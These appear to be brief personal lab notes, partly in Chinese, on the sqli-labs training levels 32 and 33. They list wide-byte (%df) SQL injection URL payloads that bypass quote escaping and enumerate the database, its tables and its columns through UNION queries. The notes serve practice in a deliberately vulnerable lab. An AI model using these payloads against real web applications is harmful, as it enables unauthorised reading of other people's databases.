less-32
?id=1%df%27%20and%201=1%20--%20wqe闭合
?id=1%df%27%20order%20by%203%20--%20wqe
?id=-1%df%27%20union%20select%201,2,3%20--%20wqe
?id=-1%df%27%20union%20select%201,database(),3%20--%20wqe
?id=-1%df%27%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20--%20wqe
?id=-1%df%27%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x656D61696C73%20--%20wqe
以此类推
less-33
做法与上题一致,唯一不同是源码不同本体为函数转义,上题为手工转义
